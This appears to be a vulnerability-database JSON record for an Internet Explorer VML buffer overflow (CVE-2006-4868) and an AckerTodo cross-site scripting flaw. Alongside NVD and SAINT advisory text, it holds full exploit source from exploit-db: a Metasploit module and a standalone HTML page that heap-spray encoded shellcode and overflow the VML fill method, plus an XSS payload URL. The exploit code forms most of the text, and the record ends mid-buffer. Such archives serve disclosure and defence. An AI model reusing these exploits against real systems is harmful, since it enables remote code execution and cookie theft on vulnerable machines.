{"cve": [{"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag.", "modified": "2019-04-30T14:27:00", "id": "CVE-2006-4868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4868", "published": "2006-09-19T19:07:00", "title": "CVE-2006-4868", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in index.php in Rob Hensley AckerTodo 4.0 allows remote attackers to inject arbitrary web script or HTML via the task_id parameter in an edit_task command.", "modified": "2018-10-17T21:39:00", "id": "CVE-2006-4668", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4668", "published": "2006-09-09T00:04:00", "title": "CVE-2006-4668", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 09/20/2006 \nCVE: [CVE-2006-4868](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868>) \nBID: [20096](<http://www.securityfocus.com/bid/20096>) \nOSVDB: [28946](<http://www.osvdb.org/28946>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nA buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long `**fill**` parameter within a `**rect**` tag. \n\n### Resolution\n\nhttp://www.microsoft.com/technet/security/advisory/925568.mspx \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA06-262A.html> \n\n\n### Limitations\n\nExploit works on Internet Explorer 6.0 and requires a user to load the exploit page in a vulnerable browser. \n\nThere may be a delay before the exploit succeeds due to the large amount of memory required on the target. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-09-20T00:00:00", "published": "2006-09-20T00:00:00", "id": "SAINT:9F72B0CFF58AD7A47199484386986BB7", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_vml_rect_fill", "title": "Internet Explorer VML rect fill buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "description": "Added: 09/20/2006 \nCVE: [CVE-2006-4868](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868>) \nBID: [20096](<http://www.securityfocus.com/bid/20096>) \nOSVDB: [28946](<http://www.osvdb.org/28946>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nA buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long `**fill**` parameter within a `**rect**` tag. \n\n### Resolution\n\nhttp://www.microsoft.com/technet/security/advisory/925568.mspx \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA06-262A.html> \n\n\n### Limitations\n\nExploit works on Internet Explorer 6.0 and requires a user to load the exploit page in a vulnerable browser. \n\nThere may be a delay before the exploit succeeds due to the large amount of memory required on the target. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-09-20T00:00:00", "published": "2006-09-20T00:00:00", "id": "SAINT:580A16A959FD7F0F499A49F545FE25DC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_vml_rect_fill", "type": "saint", "title": "Internet Explorer VML rect fill buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 09/20/2006 \nCVE: [CVE-2006-4868](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868>) \nBID: [20096](<http://www.securityfocus.com/bid/20096>) \nOSVDB: [28946](<http://www.osvdb.org/28946>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nA buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long `**fill**` parameter within a `**rect**` tag. \n\n### Resolution\n\nhttp://www.microsoft.com/technet/security/advisory/925568.mspx \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA06-262A.html> \n\n\n### Limitations\n\nExploit works on Internet Explorer 6.0 and requires a user to load the exploit page in a vulnerable browser. \n\nThere may be a delay before the exploit succeeds due to the large amount of memory required on the target. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-09-20T00:00:00", "published": "2006-09-20T00:00:00", "id": "SAINT:6A37B01591A310C332C01DD4BCA3324B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_vml_rect_fill", "type": "saint", "title": "Internet Explorer VML rect fill buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T00:13:20", "bulletinFamily": "exploit", "description": "Internet Explorer VML Fill Method Code Execution. CVE-2006-4868. Remote exploit for windows platform", "modified": "2010-07-03T00:00:00", "published": "2010-07-03T00:00:00", "id": "EDB-ID:16597", "href": "https://www.exploit-db.com/exploits/16597/", "type": "exploitdb", "title": "Microsoft Internet Explorer - VML Fill Method Code Execution", "sourceData": "##\r\n# $Id: ms06_055_vml_method.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Internet Explorer VML Fill Method Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer using\r\n\t\t\t\ta buffer overflow in the VML processing code (VGX.dll). This module has been tested on\r\n\t\t\t\tWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'Aviv Raff <avivra [at] gmail.com>',\r\n\t\t\t\t\t'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',\r\n\t\t\t\t\t'Mr.Niega <Mr.Niega [at] gmail.com>',\r\n\t\t\t\t\t'M. Shirk <shirkdog_list [at] hotmail.com>'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9669 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-4868' ],\r\n\t\t\t\t\t['OSVDB', '28946' ],\r\n\t\t\t\t\t['MSB', 'MS06-055' ],\r\n\t\t\t\t\t['BID', '20096' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Sep 19 2006'))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Determine the buffer length to use\r\n\t\tbuflen = 1024\r\n\t\tif (request.headers['User-Agent'] =~ /Windows 5\\.[123]/)\r\n\t\t\tbuflen = 65535\r\n\t\tend\r\n\r\n\t\t# Encode the shellcode\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Get a unicode friendly version of the return address\r\n\t\taddr_word = [target.ret].pack('V').unpack('H*')[0][0,4]\r\n\r\n\t\t# Select a random VML element to use\r\n\t\tvmls = %w{ rect roundrect line polyline oval image arc curve }\r\n\t\tvmlelem = vmls[ rand(vmls.length) ]\r\n\r\n\t\t# The overflow buffer for the method attribute\r\n\t\tbuffer = (\"&#x\" + addr_word + \";\") * buflen\r\n\r\n\t\t# Generate a random XML namespace for VML\r\n\t\txmlns = rand_text_alpha(rand(30)+2)\r\n\r\n\t\t# Randomize the javascript variable names\r\n\t\tvar_buffer = rand_text_alpha(rand(30)+2)\r\n\t\tvar_shellcode = rand_text_alpha(rand(30)+2)\r\n\t\tvar_unescape = rand_text_alpha(rand(30)+2)\r\n\t\tvar_x = rand_text_alpha(rand(30)+2)\r\n\t\tvar_i = rand_text_alpha(rand(30)+2)\r\n\r\n\t\t# Build out the message\r\n\t\tcontent = %Q|\r\n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" >\r\n<head>\r\n<style> #{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style>\r\n<body>\r\n<script>\r\n\r\n\tvar #{var_unescape} = unescape ;\r\n\tvar #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ;\r\n\r\n\tvar #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ;\r\n\twhile (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;\r\n\r\n\tvar #{var_x} = new Array() ;\r\n\tfor ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {\r\n\t\t#{var_x}[ #{var_i} ] =\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;\r\n\t}\r\n\r\n</script>\r\n<#{xmlns}:#{vmlelem}>\r\n\t<#{xmlns}:fill method = \"#{buffer}\" />\r\n</#{xmlns}:#{vmlelem}>\r\n\r\n</body>\r\n</html>\r\n\t\t|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16597/"}, {"lastseen": "2016-02-03T08:17:16", "bulletinFamily": "exploit", "description": "AckerTodo 4.0 Index.PHP Cross-Site Scripting Vulnerability. CVE-2006-4668. Webapps exploit for php platform", "modified": "2006-09-07T00:00:00", "published": "2006-09-07T00:00:00", "id": "EDB-ID:28494", "href": "https://www.exploit-db.com/exploits/28494/", "type": "exploitdb", "title": "AckerTodo 4.0 Index.PHP Cross-Site Scripting Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/19894/info\r\n\r\nAckerTodo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting this issue would allow an attacker to steal cookie-based credentials and to launch other attacks.\r\n\r\nVersion 4.0 is vulnerable; other versions may also be affected.\r\n\r\nindex.php?cmd=edit_task&task_id=\"><script>document.write(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28494/"}, {"lastseen": "2016-01-31T16:14:02", "bulletinFamily": "exploit", "description": "MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2). CVE-2006-3866,CVE-2006-4868. Remote exploit for windows platform", "modified": "2006-09-24T00:00:00", "published": "2006-09-24T00:00:00", "id": "EDB-ID:2425", "href": "https://www.exploit-db.com/exploits/2425/", "type": "exploitdb", "title": "Microsoft Internet Explorer VML Remote Buffer Overflow Exploit XP SP2", "sourceData": "<!--\r\n\r\n..::[ jamikazu presents ]::..\r\n\r\nMicrosoft Internet Explorer VML Remote Buffer Overflow Exploit (0day)\r\nWorks on all Windows XP versions including SP2\r\n\r\nAuthor: jamikazu \r\nMail: jamikazu@gmail.com\r\n\r\nCredit: metasploit, SkyLined\r\n\r\ninvokes calc.exe if successful \r\n\r\n\r\n-->\r\n\r\n<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\r\n\r\n<head>\r\n<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\r\n</object>\r\n<style>\r\nv\\:* { behavior: url(#VMLRender); }\r\n</style>\r\n</head>\r\n\r\n<body>\r\n\r\n<SCRIPT language=\"javascript\">\r\n\r\n\tvar heapSprayToAddress = 0x05050505;\r\n\r\n\tvar payLoadCode = unescape(\"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063\");\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n\tmemory = new Array();\r\n\r\n\tfor (i=0;i<heapBlocks;i++)\r\n\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n\r\n\r\n\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n\t\treturn spraySlide;\r\n\t}\r\n\r\n</script> \r\n<v:rect style='width:120pt;height:80pt' fillcolor=\"red\">\r\n<v:fill method = \"ԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅ